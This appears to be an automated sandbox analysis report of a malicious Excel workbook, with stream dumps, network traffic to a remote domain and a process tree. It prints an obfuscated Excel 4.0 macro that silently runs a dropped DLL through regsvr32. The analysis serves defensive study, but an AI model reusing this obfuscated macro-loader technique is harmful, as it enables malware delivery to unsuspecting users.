                      MiV(sem.value)
                      homepodd()
                      homepodd
                      Error
                      Integer)
                      bycilke
                      Function
                      ol).Name
                      "!"):
                      String
                      "ab":
                      Split(govs,
                      Randomize:
                      yellowsto(yel
                      Next:
                      ActiveSheet.UsedRange.SpecialCells(xlCellTypeConstants)
                      yellowsto(Oa))))
                      Integer
                      yellowsto
                      ol).value
                      nimo(Int((UBound(nimo)
                      Replace(Vo,
                      Chr(sem.Row)
                      Sheets(ol).Cells(homepodd,
                      "ab"))
                      Split(kij(ol),
                      yellowsto(homepodd))
                      Rnd))
                      (Run(""
                      "moreP_"
                      Variant)
                      Attribute
                      Resume
                      pagesREviewsd(Optional
                      ecimovert(nimo
                      ecimovert
                      MsgBox
                      VBA Code
                      VBA File Name: Sheet1.cls, Stream Size: 1614
                      General
                      Stream Path:VBA/Sheet1
                      VBA File Name:Sheet1.cls
                      Stream Size:1614
                      Data ASCII:. . . . . . . . . . . . . . . . . & . . . . . . . . . . . . . . . . . . . . . . . . x . k . . . . c . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . " . v i e w _ 1 _ a , 1 , 0 , M S F o r m s , M u l t i P a g e . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . .
                      Data Raw:01 16 03 00 00 16 01 00 00 c8 03 00 00 fa 00 00 00 26 02 00 00 ff ff ff ff cf 03 00 00 e3 04 00 00 00 00 00 00 01 00 00 00 ba 78 c2 6b 00 00 ff ff 63 00 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

                      VBA Code Keywords

                      Keyword
                      Index
                      VB_Name
                      VB_Creatable
                      Application.OnTime
                      VB_Exposed
                      Long)
                      ResizePagess()
                      VB_Customizable
                      "REviewsd"
                      VB_Control
                      MultiPage"
                      VB_TemplateDerived
                      MSForms,
                      False
                      Attribute
                      Private
                      VB_PredeclaredId
                      VB_GlobalNameSpace
                      VB_Base
                      ResizePagess
                      "pages"
                      VBA Code
                      VBA File Name: ThisWorkbook.cls, Stream Size: 999
                      General
                      Stream Path:VBA/ThisWorkbook
                      VBA File Name:ThisWorkbook.cls
                      Stream Size:999
                      Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . - . . . . . . . . . . . . x . d . . . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                      Data Raw:01 16 03 00 00 f0 00 00 00 d2 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff d9 02 00 00 2d 03 00 00 00 00 00 00 01 00 00 00 ba 78 1c 64 00 00 ff ff 23 00 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

                      VBA Code Keywords

                      Keyword
                      False
                      VB_Exposed
                      Attribute
                      VB_Name
                      VB_Creatable
                      "ThisWorkbook"
                      VB_PredeclaredId
                      VB_GlobalNameSpace
                      VB_Base
                      VB_Customizable
                      VB_TemplateDerived
                      VBA Code

                      Streams

                      Stream Path: PROJECT, File Type: ASCII text, with CRLF line terminators, Stream Size: 554
                      General
                      Stream Path:PROJECT
                      File Type:ASCII text, with CRLF line terminators
                      Stream Size:554
                      Entropy:5.25519546931
                      Base64 Encoded:True
                      Data ASCII:I D = " { 4 9 3 4 E D C 8 - 1 B 9 3 - 4 5 B C - B 6 9 3 - D B B 2 9 D 5 C 1 4 7 0 } " . . D o c u m e n t = T h i s W o r k b o o k / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = S h e e t 1 / & H 0 0 0 0 0 0 0 0 . . M o d u l e = M o d u l e 1 . . N a m e = " V B A P r o j e c t " . . H e l p C o n t e x t I D = " 0 " . . V e r s i o n C o m p a t i b l e 3 2 = " 3 9 3 2 2 2 0 0 0 " . . C M G = " 3 7 3 5 C 4 1 F C C 6 1 0 7 6 5 0 7 6 5 0 7 6 5 0 7 6 5 " . . D P B = " 6 E 6 C 9 D 6 8 E 3 A 8 1 B A 9 1 B A 9 1
                      Data Raw:49 44 3d 22 7b 34 39 33 34 45 44 43 38 2d 31 42 39 33 2d 34 35 42 43 2d 42 36 39 33 2d 44 42 42 32 39 44 35 43 31 34 37 30 7d 22 0d 0a 44 6f 63 75 6d 65 6e 74 3d 54 68 69 73 57 6f 72 6b 62 6f 6f 6b 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 44 6f 63 75 6d 65 6e 74 3d 53 68 65 65 74 31 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 4d 6f 64 75 6c 65 3d 4d 6f 64 75 6c 65 31 0d 0a 4e 61 6d 65 3d
                      Stream Path: PROJECTwm, File Type: data, Stream Size: 86
                      General
                      Stream Path:PROJECTwm
                      File Type:data
                      Stream Size:86
                      Entropy:3.24455457963
                      Base64 Encoded:False
                      Data ASCII:T h i s W o r k b o o k . T . h . i . s . W . o . r . k . b . o . o . k . . . S h e e t 1 . S . h . e . e . t . 1 . . . M o d u l e 1 . M . o . d . u . l . e . 1 . . . . .
                      Data Raw:54 68 69 73 57 6f 72 6b 62 6f 6f 6b 00 54 00 68 00 69 00 73 00 57 00 6f 00 72 00 6b 00 62 00 6f 00 6f 00 6b 00 00 00 53 68 65 65 74 31 00 53 00 68 00 65 00 65 00 74 00 31 00 00 00 4d 6f 64 75 6c 65 31 00 4d 00 6f 00 64 00 75 00 6c 00 65 00 31 00 00 00 00 00
                      Stream Path: VBA/_VBA_PROJECT, File Type: data, Stream Size: 3574
                      General
                      Stream Path:VBA/_VBA_PROJECT
                      File Type:data
                      Stream Size:3574
                      Entropy:4.46002460936
                      Base64 Encoded:False
                      Data ASCII:. a . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . * . \\ . G . { . 0 . 0 . 0 . 2 . 0 . 4 . E . F . - . 0 . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . - . C . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 4 . 6 . } . # . 4 . . . 2 . # . 9 . # . C . : . \\ . P . r . o . g . r . a . m . . F . i . l . e . s . \\ . C . o . m . m . o . n . . F . i . l . e . s . \\ . M . i . c . r . o . s . o . f . t . . S . h . a . r . e . d . \\ . V . B . A . \\ . V . B . A . 7 . . . 1 . \\ . V . B . E . 7 .
                      Data Raw:cc 61 b2 00 00 03 00 ff 09 04 00 00 09 04 00 00 e4 04 03 00 00 00 00 00 00 00 00 00 01 00 05 00 02 00 20 01 2a 00 5c 00 47 00 7b 00 30 00 30 00 30 00 32 00 30 00 34 00 45 00 46 00 2d 00 30 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 2d 00 43 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 34 00 36 00 7d 00 23 00 34 00 2e 00 32 00 23 00
                      Stream Path: VBA/__SRP_0, File Type: data, Stream Size: 2060
                      General
                      Stream Path:VBA/__SRP_0
                      File Type:data
                      Stream Size:2060
                      Entropy:3.45134089702
                      Base64 Encoded:False
                      Data ASCII:. K * . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . r U . . . . . . . . @ . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ X . . . . . . . . . . . . . . . " . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . Q . . . . . . . . . . . E . . . . . . C . _ . . . : . . . . . . . . . .
                      Data Raw:93 4b 2a b2 03 00 10 00 00 00 ff ff 00 00 00 00 01 00 02 00 ff ff 00 00 00 00 01 00 00 00 02 00 00 00 00 00 01 00 02 00 02 00 00 00 00 00 01 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 00 00 72 55 c0 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 06 00 00 00 00 00 00 7e 02 00 00 00 00 00 00 7e 02 00 00 00
                      Stream Path: VBA/__SRP_1, File Type: data, Stream Size: 187
                      General
                      Stream Path:VBA/__SRP_1
                      File Type:data
                      Stream Size:187
                      Entropy:1.91493173134
                      Base64 Encoded:False
                      Data ASCII:r U @ . . . . . . . . . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . w q . . . . . . . . . . . . . . . . n i m o . . . . . . . . . . . . . . . . y e l ^ . . . . . . . . . . . . . . .
                      Data Raw:72 55 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 12 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 00 00 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 00 00 00 00 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 11 00 00 00 00 00 00 00 00 00 03 00 02 00 00 00 00 00 00 08 02 00 00 00 00 00
                      Stream Path: VBA/__SRP_2, File Type: data, Stream Size: 363
                      General
                      Stream Path:VBA/__SRP_2
                      File Type:data
                      Stream Size:363
                      Entropy:2.21122978445
                      Base64 Encoded:False
                      Data ASCII:r U . . . . . . . . @ . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . ~ x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . a . . . . . . . . . . . . . . . . . . . . Z . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . Z . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                      Data Raw:72 55 c0 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 04 00 00 00 00 00 00 7e 78 00 00 00 00 00 00 7f 00 00 00 00 00 00 00 00 1a 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 03 00 10 00 00 00 00 00 00 00 00 00 02 00 00 00 00 00 00 00 00 00 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff
                      Stream Path: VBA/__SRP_3, File Type: data, Stream Size: 398
                      General
                      Stream Path:VBA/__SRP_3
                      File Type:data
                      Stream Size:398
                      Entropy:2.07709195049
                      Base64 Encoded:False
                      Data ASCII:r U @ . . . . . . . . . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 8 . . . . . . . . . . . . . . . . ` . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . @ . q . . . . . . . . . . . . . . ` . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . F . 8 . . . . . . . . . . . . . . . . ` . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . @ . . . . . . .
                      Data Raw:72 55 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1a 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 02 00 ff ff ff ff ff ff ff ff ff ff ff ff 00 00 00 00 10 00 00 00 08 00 38 00 f1 00 00 00 00 00 00 00 00 00 02 00 00 00 00 60 00 00 fd ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 00 00 00 00
                      Stream Path: VBA/dir, File Type: data, Stream Size: 820
                      General
                      Stream Path:VBA/dir
                      File Type:data
                      Stream Size:820
                      Entropy:6.5044215585
                      Base64 Encoded:True
                      Data ASCII:. 0 . . . . . . . . . . 0 * . . . . . p . . H . . . . . d . . . . . . . . V B A P r o j e . c t . . 4 . . @ . . j . . . = . . . . r . . . . . . . . . . . . a . . . . . J < . . . . . r . s t d o l e > . . . s . t . d . o . . l . e . . . h . % . ^ . . * \\ G { 0 0 . 0 2 0 4 3 0 - . . . . . C . . . . . . 0 0 4 . 6 } # 2 . 0 # 0 . # C : \\ W i n d . o w s \\ S y s t e m 3 2 \\ . e 2 . . t l b # O L E . A u t o m a t i . o n . ` . . . E O f f D i c . E O . f . . i . . c . E . . . . . . . E . 2 D F 8 D 0 4 C . -
                      Data Raw:01 30 b3 80 01 00 04 00 00 00 03 00 30 2a 02 02 90 09 00 70 14 06 48 03 00 82 02 00 64 e4 04 04 00 0a 00 1c 00 56 42 41 50 72 6f 6a 65 88 63 74 05 00 34 00 00 40 02 14 6a 06 02 0a 3d 02 0a 07 02 72 01 14 08 05 06 12 09 02 12 7f 90 eb 61 05 94 00 0c 02 4a 3c 02 0a 16 00 01 72 80 73 74 64 6f 6c 65 3e 02 19 00 73 00 74 00 64 00 6f 00 80 6c 00 65 00 0d 00 68 00 25 02 5e 00 03 2a 5c 47

                      Macro 4.0 Code

                      CALL(wegb&o0, "S"&ohgdfww&"A", i0&i0&"CCCC"&i0, 0, v0&"p"&w00&"n", "r"&w00&"gsvr"&o0, " -s "&bb&ab&ba, 0, 0)
                      
                      "=CALL(wegb&o0,""S""&ohgdfww&""A"",i0&i0&""CCCC""&i0,0,v0&""p""&w00&""n"",""r""&w00&""gsvr""&o0,"" -s ""&bb&ab&ba,0,0)"=RETURN()

                      OLE File "/opt/package/joesandbox/database/analysis/338158/sample/sample20210111-01.xlsm"

                      Indicators

                      Has Summary Info:False
                      Application Name:unknown
                      Encrypted Document:False
                      Contains Word Document Stream:
                      Contains Workbook/Book Stream:
                      Contains PowerPoint Document Stream:
                      Contains Visio Document Stream:
                      Contains ObjectPool Stream:
                      Flash Objects Count:
                      Contains VBA Macros:False

                      Summary

                      Author:
                      Last Saved By:
                      Create Time:2020-12-07T14:38:21Z
                      Last Saved Time:2021-01-11T13:42:02Z
                      Creating Application:Microsoft Excel
                      Security:0

                      Document Summary

                      Thumbnail Scaling Desired:false
                      Company:
                      Contains Dirty Links:false
                      Shared Document:false
                      Changed Hyperlinks:false
                      Application Version:16.0300

                      Streams

                      Stream Path: \x1CompObj, File Type: data, Stream Size: 115
                      General
                      Stream Path:\x1CompObj
                      File Type:data
                      Stream Size:115
                      Entropy:4.80096587863
                      Base64 Encoded:False
                      Data ASCII:. . . . . . . . . . . . p . . F z ? . . . . . . . a . . . . . . M i c r o s o f t F o r m s 2 . 0 F o r m . . . . . E m b e d d e d O b j e c t . . . . . F o r m s . M u l t i P a g e . 1 . . 9 . q . . . . . . . . . . . .
                      Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 70 13 e3 46 7a 3f ce 11 be d6 00 aa 00 61 10 80 19 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 46 6f 72 6d 73 20 32 2e 30 20 46 6f 72 6d 00 10 00 00 00 45 6d 62 65 64 64 65 64 20 4f 62 6a 65 63 74 00 12 00 00 00 46 6f 72 6d 73 2e 4d 75 6c 74 69 50 61 67 65 2e 31 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                      Stream Path: f, File Type: data, Stream Size: 178
                      General
                      Stream Path:f
                      File Type:data
                      Stream Size:178
                      Entropy:2.59766210867
                      Base64 Encoded:False
                      Data ASCII:. . $ . H . . . . . . . . @ . . . . . . . } . . . . . . . . . . . . . . . . . . . . . . . . t . . . . . . . . . . . . . . . . . . . 2 . . . . . . . . . . . . . . . . . . . . . $ . . . . . . . . . . . . . # . . . . . . . P a g e 1 . . . . . . . . . . . . . $ . . . . . . . . . . . . . ! . . . . . . . P a g e 2 . . . 5 . . . . . . . . . . . . . . . T . . .
                      Data Raw:00 04 24 00 48 0c 00 0c 03 00 00 00 04 40 00 00 04 00 00 00 00 7d 00 00 84 00 00 00 84 00 00 00 00 00 00 00 00 00 00 00 00 00 03 00 00 00 74 00 00 00 00 83 01 b0 00 00 1c 00 f4 01 00 00 01 00 00 00 32 00 00 00 98 00 00 00 00 00 12 00 00 00 00 00 00 00 00 00 00 00 24 00 d5 01 00 00 05 00 00 80 02 00 00 00 23 00 04 00 01 00 07 00 50 61 67 65 31 00 00 00 00 00 00 00 00 00 00 00 00 00
                      Stream Path: i02/\x1CompObj, File Type: data, Stream Size: 110
                      General
                      Stream Path:i02/\x1CompObj
                      File Type:data
                      Stream Size:110
                      Entropy:4.63372611993
                      Base64 Encoded:False
                      Data ASCII:. . . . . . . . . . . . . i * . . . . . . . . . . W J O . . . . M i c r o s o f t F o r m s 2 . 0 F o r m . . . . . E m b e d d e d O b j e c t . . . . . F o r m s . F o r m . 1 . . 9 . q . . . . . . . . . . . .
                      Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff f0 69 2a c6 dc 16 ce 11 9e 98 00 aa 00 57 4a 4f 19 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 46 6f 72 6d 73 20 32 2e 30 20 46 6f 72 6d 00 10 00 00 00 45 6d 62 65 64 64 65 64 20 4f 62 6a 65 63 74 00 0d 00 00 00 46 6f 72 6d 73 2e 46 6f 72 6d 2e 31 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                      Stream Path: i02/f, File Type: data, Stream Size: 40
                      General
                      Stream Path:i02/f
                      File Type:data
                      Stream Size:40
                      Entropy:1.54176014818
                      Base64 Encoded:False
                      Data ASCII:. . . . @ . . . . . . . . } . . . . . . . . . . . . . . . . . . . . . . . . . .
                      Data Raw:00 04 1c 00 40 0c 00 08 04 80 00 00 00 7d 00 00 84 00 00 00 84 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                      Stream Path: i02/o, File Type: empty, Stream Size: 0
                      General
                      Stream Path:i02/o
                      File Type:empty
                      Stream Size:0
                      Entropy:0.0
                      Base64 Encoded:False
                      Data ASCII:
                      Data Raw:
                      Stream Path: i03/\x1CompObj, File Type: data, Stream Size: 110
                      General
                      Stream Path:i03/\x1CompObj
                      File Type:data
                      Stream Size:110
                      Entropy:4.63372611993
                      Base64 Encoded:False
                      Data ASCII:. . . . . . . . . . . . . i * . . . . . . . . . . W J O . . . . M i c r o s o f t F o r m s 2 . 0 F o r m . . . . . E m b e d d e d O b j e c t . . . . . F o r m s . F o r m . 1 . . 9 . q . . . . . . . . . . . .
                      Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff f0 69 2a c6 dc 16 ce 11 9e 98 00 aa 00 57 4a 4f 19 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 46 6f 72 6d 73 20 32 2e 30 20 46 6f 72 6d 00 10 00 00 00 45 6d 62 65 64 64 65 64 20 4f 62 6a 65 63 74 00 0d 00 00 00 46 6f 72 6d 73 2e 46 6f 72 6d 2e 31 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                      Stream Path: i03/f, File Type: data, Stream Size: 40
                      General
                      Stream Path:i03/f
                      File Type:data
                      Stream Size:40
                      Entropy:1.90677964945
                      Base64 Encoded:False
                      Data ASCII:. . . . @ . . . . . . . . } . . n . . . . . . . . . . . . . . . . . . . . . . .
                      Data Raw:00 04 1c 00 40 0c 00 08 04 80 00 00 00 7d 00 00 6e 13 00 00 fd 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                      Stream Path: i03/o, File Type: empty, Stream Size: 0
                      General
                      Stream Path:i03/o
                      File Type:empty
                      Stream Size:0
                      Entropy:0.0
                      Base64 Encoded:False
                      Data ASCII:
                      Data Raw:
                      Stream Path: o, File Type: data, Stream Size: 152
                      General
                      Stream Path:o
                      File Type:data
                      Stream Size:152
                      Entropy:2.68720470607
                      Base64 Encoded:False
                      Data ASCII:. . p . 1 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . P a g e 1 . . . . . . . P a g e 2 . . . . . . . . . . . . . . . T a b 3 . . . . T a b 4 . . . . . . . . . . . . . . . . . . . . 5 . . . . . . . . . . . . . . . C a l i b r i . . . . . . . . .
                      Data Raw:00 02 70 00 31 82 fa 00 00 00 00 00 18 00 00 00 02 00 00 00 08 00 00 00 10 00 00 00 04 00 00 00 08 00 00 00 02 00 00 00 08 00 00 00 84 00 00 00 84 00 00 00 05 00 00 80 50 61 67 65 31 00 00 00 05 00 00 80 50 61 67 65 32 00 00 00 00 00 00 00 00 00 00 00 04 00 00 80 54 61 62 33 04 00 00 80 54 61 62 34 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 02 18 00 35 00 00 00 07 00 00 80
                      Stream Path: x, File Type: data, Stream Size: 48
                      General
                      Stream Path:x
                      File Type:data
                      Stream Size:48
                      Entropy:1.42267983198
                      Base64 Encoded:False
                      Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                      Data Raw:00 02 04 00 00 00 00 00 00 02 04 00 00 00 00 00 00 02 04 00 00 00 00 00 00 02 0c 00 06 00 00 00 02 00 00 00 01 00 00 00 02 00 00 00 03 00 00 00

                      Macro 4.0 Code

                      CALL(wegb&o0, "S"&ohgdfww&"A", i0&i0&"CCCC"&i0, 0, v0&"p"&w00&"n", "r"&w00&"gsvr"&o0, " -s "&bb&ab&ba, 0, 0)
                      
                      "=CALL(wegb&o0,""S""&ohgdfww&""A"",i0&i0&""CCCC""&i0,0,v0&""p""&w00&""n"",""r""&w00&""gsvr""&o0,"" -s ""&bb&ab&ba,0,0)"=RETURN()

                      Network Behavior

                      Network Port Distribution

                      TCP Packets

                      TimestampSource PortDest PortSource IPDest IP
                      Jan 11, 2021 18:28:00.002847910 CET49167443192.168.2.22199.59.242.150
                      Jan 11, 2021 18:28:00.125716925 CET44349167199.59.242.150192.168.2.22
                      Jan 11, 2021 18:28:00.125803947 CET49167443192.168.2.22199.59.242.150
                      Jan 11, 2021 18:28:00.138995886 CET49167443192.168.2.22199.59.242.150
                      Jan 11, 2021 18:28:00.262025118 CET44349167199.59.242.150192.168.2.22
                      Jan 11, 2021 18:28:00.263251066 CET44349167199.59.242.150192.168.2.22
                      Jan 11, 2021 18:28:00.263308048 CET49167443192.168.2.22199.59.242.150
                      Jan 11, 2021 18:28:00.264287949 CET49167443192.168.2.22199.59.242.150
                      Jan 11, 2021 18:28:00.265647888 CET49168443192.168.2.22199.59.242.150
                      Jan 11, 2021 18:28:00.387058973 CET44349167199.59.242.150192.168.2.22
                      Jan 11, 2021 18:28:00.388211012 CET44349168199.59.242.150192.168.2.22
                      Jan 11, 2021 18:28:00.388309956 CET49168443192.168.2.22199.59.242.150
                      Jan 11, 2021 18:28:00.389369965 CET49168443192.168.2.22199.59.242.150
                      Jan 11, 2021 18:28:00.512084007 CET44349168199.59.242.150192.168.2.22
                      Jan 11, 2021 18:28:00.512468100 CET44349168199.59.242.150192.168.2.22
                      Jan 11, 2021 18:28:00.512512922 CET44349168199.59.242.150192.168.2.22
                      Jan 11, 2021 18:28:00.512586117 CET49168443192.168.2.22199.59.242.150
                      Jan 11, 2021 18:28:00.512613058 CET49168443192.168.2.22199.59.242.150
                      Jan 11, 2021 18:28:00.526820898 CET49168443192.168.2.22199.59.242.150
                      Jan 11, 2021 18:28:00.527962923 CET49169443192.168.2.22199.59.242.150
                      Jan 11, 2021 18:28:00.649553061 CET44349168199.59.242.150192.168.2.22
                      Jan 11, 2021 18:28:00.650635004 CET44349169199.59.242.150192.168.2.22
                      Jan 11, 2021 18:28:00.650715113 CET49169443192.168.2.22199.59.242.150
                      Jan 11, 2021 18:28:00.651102066 CET49169443192.168.2.22199.59.242.150
                      Jan 11, 2021 18:28:00.773710012 CET44349169199.59.242.150192.168.2.22
                      Jan 11, 2021 18:28:00.773785114 CET49169443192.168.2.22199.59.242.150

                      UDP Packets

                      TimestampSource PortDest PortSource IPDest IP
                      Jan 11, 2021 18:27:59.845685959 CET5219753192.168.2.228.8.8.8
                      Jan 11, 2021 18:27:59.992686987 CET53521978.8.8.8192.168.2.22
                      Jan 11, 2021 18:28:36.852425098 CET5309953192.168.2.228.8.8.8
                      Jan 11, 2021 18:28:36.900594950 CET53530998.8.8.8192.168.2.22
                      Jan 11, 2021 18:28:36.939555883 CET5283853192.168.2.228.8.8.8
                      Jan 11, 2021 18:28:36.987488985 CET53528388.8.8.8192.168.2.22
                      Jan 11, 2021 18:28:38.115564108 CET6120053192.168.2.228.8.8.8
                      Jan 11, 2021 18:28:38.163610935 CET53612008.8.8.8192.168.2.22
                      Jan 11, 2021 18:28:38.174900055 CET4954853192.168.2.228.8.8.8
                      Jan 11, 2021 18:28:38.225476980 CET53495488.8.8.8192.168.2.22
                      Jan 11, 2021 18:28:38.506975889 CET5562753192.168.2.228.8.8.8
                      Jan 11, 2021 18:28:38.555064917 CET53556278.8.8.8192.168.2.22
                      Jan 11, 2021 18:28:38.562401056 CET5600953192.168.2.228.8.8.8
                      Jan 11, 2021 18:28:38.610411882 CET53560098.8.8.8192.168.2.22

                      DNS Queries

                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                      Jan 11, 2021 18:27:59.845685959 CET192.168.2.228.8.8.80x26d4Standard query (0)ppdb-legacy.man1lamongan.comA (IP address)IN (0x0001)

                      DNS Answers

                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                      Jan 11, 2021 18:27:59.992686987 CET8.8.8.8192.168.2.220x26d4No error (0)ppdb-legacy.man1lamongan.com199.59.242.150A (IP address)IN (0x0001)
                      Jan 11, 2021 18:28:38.163610935 CET8.8.8.8192.168.2.220xa0c2No error (0)cdn.digicertcdn.com104.18.10.39A (IP address)IN (0x0001)
                      Jan 11, 2021 18:28:38.163610935 CET8.8.8.8192.168.2.220xa0c2No error (0)cdn.digicertcdn.com104.18.11.39A (IP address)IN (0x0001)
                      Jan 11, 2021 18:28:38.225476980 CET8.8.8.8192.168.2.220x342No error (0)cdn.digicertcdn.com104.18.11.39A (IP address)IN (0x0001)
                      Jan 11, 2021 18:28:38.225476980 CET8.8.8.8192.168.2.220x342No error (0)cdn.digicertcdn.com104.18.10.39A (IP address)IN (0x0001)

                      Code Manipulations

                      Statistics

                      Behavior

                      Click to jump to process

                      System Behavior

                      General

                      Start time:18:27:41
                      Start date:11/01/2021
                      Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                      Wow64 process (32bit):false
                      Commandline:'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
                      Imagebase:0x13f530000
                      File size:27641504 bytes
                      MD5 hash:5FB0A0F93382ECD19F5F499A5CAA59F0
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:high

                      General

                      Start time:18:27:48
                      Start date:11/01/2021
                      Path:C:\Windows\System32\regsvr32.exe
                      Wow64 process (32bit):false
                      Commandline:'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\fhmhkjo.dll.
                      Imagebase:0xffe30000
                      File size:19456 bytes
                      MD5 hash:59BCE9F07985F8A4204F4D6554CFF708
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:high

                      General

                      Start time:18:28:06
                      Start date:11/01/2021
                      Path:C:\Program Files\Common Files\Microsoft Shared\DW\DW20.EXE
                      Wow64 process (32bit):false
                      Commandline:'C:\PROGRA~1\COMMON~1\MICROS~1\DW\DW20.EXE' -x -s 1948
                      Imagebase:0x13f3f0000
                      File size:995024 bytes
                      MD5 hash:45A078B2967E0797360A2D4434C41DB4
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:moderate

                      General

                      Start time:18:28:06
                      Start date:11/01/2021
                      Path:C:\Windows\System32\DWWIN.EXE
                      Wow64 process (32bit):false
                      Commandline:C:\Windows\system32\dwwin.exe -x -s 1948
                      Imagebase:0xff840000
                      File size:152576 bytes
                      MD5 hash:25247E3C4E7A7A73BAEEA6C0008952B1
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:moderate

                      Disassembly

                      Code Analysis

                      Reset < >